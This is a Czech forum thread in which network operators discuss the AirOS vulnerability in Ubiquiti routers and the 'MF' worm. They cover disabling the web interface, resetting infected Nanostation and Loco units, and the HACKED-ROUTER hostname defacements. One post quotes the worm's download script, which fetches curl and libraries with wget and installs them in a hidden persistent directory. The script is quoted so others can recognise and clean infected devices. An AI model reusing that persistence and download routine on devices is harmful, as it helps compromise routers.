Bezpečnostní chyba v AirOS

[helapc]

Ono bez toho webu je to dost bezzubé, to že se nedá nic kloudně nastavit ještě vem čert, ale i rychlý nákuk na informace o spoji je pak prostě opruz. A nejsem si jistý, že jde povolit web bez rebootu ... musel by být na to fígl, který neznám.

Není lepší zakázat Web, jak jsme již psal na začátku? SSH použije až když si tam nahraje klíč.

A i když si to tedy u infrastrukturních věcí představím a budu to tak používat ... u klientských věcí je to prostě nemožné. U domácích wifi routerů stoprocentně.

Bezzubé to není, web server ti jen umožňuje pouštět příkazy z grafického prostředí. Pár příkazů jsem už uvedl výše. Taky jsem uvedl jak zapínat Web prostředí a žádný restart u toho nenastane. http_enable
Snažím se jen prezentovat, že díra a problém je Web server, rozhodně není problém scriptování a ssh.

[helapc]

jenže mf.tar odtamtud netahá ... to by pak byla obrana asi poměrně hodně jednoduchá. Alespoň v první fázi.

Obsah scrimtu download ve viru MF:
#!/bin/sh
per=/etc/persistent/.mf

test -d /tmp/down || mkdir /tmp/down
cd /tmp/down

dwn() {
wget -O temp.ipk $1
tar -xzf temp.ipk
tar -xzf data.tar.gz
mv $2 $per
rm -rf /tmp/down/*
}



test -e $per/curl || dwn http://downloads.openwrt.org/kamikaze/8 ... 1_mips.ipk usr/bin/curl
chmod +x $per/curl
test -e $per/libcurl.so.4 || dwn http://downloads.openwrt.org/kamikaze/8 ... 1_mips.ipk usr/lib/libcurl.so.4.0.1
mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
test -e $per/libssl.so.0.9.8 || dwn http://downloads.openwrt.org/kamikaze/8 ... 1_mips.ipk 'usr/lib/lib*'

Jak napsal kolega výše tahá si curl. Důležitý je, že když to zjistíš máš možnost zařízení odvirovat dřív než ti lehne, tudíž vzdáleně.

[Robotvor]

U několika starších jednotek ( Nanostation5 a Loco ) jsme se setkali s problémem že nejdou vyresetovat klasickým způsobem ( přidržení reset tlačítka ) vyresetovat to jde pouze tak že se zařízení první přepne do servisního menu a jakmile je přepnuto znova se na krátko zmáčkne tlačítko reset pak se zařízeno vyresetuje.


Reset byl nutný kvuli tomu že se do zařízení nešlo dostat přes webové rozhraní které se vubec nezobrazí ani SSH.

Setkal se stím někdo?

[lyra]

U několika starších jednotek ( Nanostation5 a Loco ) jsme se setkali s problémem že nejdou vyresetovat klasickým způsobem ( přidržení reset tlačítka ) vyresetovat to jde pouze tak že se zařízení první přepne do servisního menu a jakmile je přepnuto znova se na krátko zmáčkne tlačítko reset pak se zařízeno vyresetuje.


Reset byl nutný kvuli tomu že se do zařízení nešlo dostat přes webové rozhraní které se vubec nezobrazí ani SSH.

Setkal se stím někdo?

Ano samozřejmě al u 50 % jsme to nakonec stejně vyřadili a dali nové.

[CrazyApe]

U několika starších jednotek ( Nanostation5 a Loco ) jsme se setkali s problémem že nejdou vyresetovat klasickým způsobem ( přidržení reset tlačítka ) vyresetovat to jde pouze tak že se zařízení první přepne do servisního menu a jakmile je přepnuto znova se na krátko zmáčkne tlačítko reset pak se zařízeno vyresetuje.


Reset byl nutný kvuli tomu že se do zařízení nešlo dostat přes webové rozhraní které se vubec nezobrazí ani SSH.

Setkal se stím někdo?

Ano u nas taky, musel jsem do nejakeho toho módu kde se prez TFTP nahraje znova firmware.

[DarkLogic]

Taky mám asi jedno takové. Místo web rozhraní jen bílá stránka bez chybové hlášky, při pokusu o SSH po zadání přihlašovacího jména odmítne spojení (tj. nezeptá se ani na heslo). Zatím ale jinak přenáší bezproblému data zákazníků, odpovídá na pingy a na SNMP požadavky.

Zatím jsem to neřešil, ale pouhé vypnout/zapnout teda nepomůže? A je možné dostat se do servisního módu např. přes PoE zdroj s resetovacím tlačítkem, abych to mohl provést v pohodě z rozvaděče na zemi a nemusel lézt na střechu?

[Robotvor]

Taky mám asi jedno takové. Místo web rozhraní jen bílá stránka bez chybové hlášky, při pokusu o SSH po zadání přihlašovacího jména odmítne spojení (tj. nezeptá se ani na heslo). Zatím ale jinak přenáší bezproblému data zákazníků, odpovídá na pingy a na SNMP požadavky.

Zatím jsem to neřešil, ale pouhé vypnout/zapnout teda nepomůže? A je možné dostat se do servisního módu např. přes PoE zdroj s resetovacím tlačítkem, abych to mohl provést v pohodě z rozvaděče na zemi a nemusel lézt na střechu?

Přes POE s reset tlačítkem to nejde, aplikuj postup jak jsem psal výše.

[gulas]

dovolím si nesouhlasit dá se resetovat pres POE ale stary 24V cca 2x vetsi nez co davaji ted ke gridum... mám vyzkoušeno už 4 dny neděláme nic jiného než přehrávání...Předtím a ted bouřky... co prijde priste

[svestka]

http://www.root.cz/zpravicky/modifikovany-motherfucker-moth3r-se-siri-rychleji/

[raven-il]

Neni to uplne sem, ale je to novy typ utoku, tak to sem hodim.

Dneska rano se nam na nekolika ubnt routerech objevilo toto:

HACKED-ROUTER-HELP-SOS-HAD-DUPE-PASSWORD

zarizeni bezi, ale je nedostupne a nelze ho ani vyresetovat. Potkal jste se s tim nekdo ?

[miko]

Dneska rano se nam na nekolika ubnt routerech objevilo toto:
HACKED-ROUTER-HELP-SOS-HAD-DUPE-PASSWORD

aku tam mas verziu FW?

[raven-il]

Dneska rano se nam na nekolika ubnt routerech objevilo toto:
HACKED-ROUTER-HELP-SOS-HAD-DUPE-PASSWORD

aku tam mas verziu FW?

5.6.8 a 5.6.5

Neco jsou jeste stare 5.5.4 tam je hlaska HACKED-ROUTER-HELP-SOS-DEFAULT-PASSWORD

[beny-dka]

A po upgrade na poslední verzi OS to tam zůstalo ? Zkoušel jsi to projet scenem na viry od UBNT ?

[Selič]

5.6.8 a 5.6.5

Neco jsou jeste stare 5.5.4 tam je hlaska HACKED-ROUTER-HELP-SOS-DEFAULT-PASSWORD

Tak na těch starých máš motherfuckera a jestli mají ty novější stejná hesla, tak se do nich motherfucker nahrál taky, přepsal heslo na MOTHERFUCKER, ale jinak samotný vir neběží.
Zkus najít na fórech hesla, na která si to motherfucker měnil a zkusit se pod nimi přihlásit. Pak upgrade na 5.6.9 a mělo by být hotovo.

[raven-il]

5.6.8 a 5.6.5

Neco jsou jeste stare 5.5.4 tam je hlaska HACKED-ROUTER-HELP-SOS-DEFAULT-PASSWORD

Tak na těch starých máš motherfuckera a jestli mají ty novější stejná hesla, tak se do nich motherfucker nahrál taky, přepsal heslo na MOTHERFUCKER, ale jinak samotný vir neběží.
Zkus najít na fórech hesla, na která si to motherfucker měnil a zkusit se pod nimi přihlásit. Pak upgrade na 5.6.9 a mělo by být hotovo.

Mate nekdo potuchy, jaky to tam zapsalo login, pokud je heslo MOTHERFUCKER ? Hledal jsem a nenasel. Osobne jsme resil jen verzi 3 a tam je to jinak.

Diky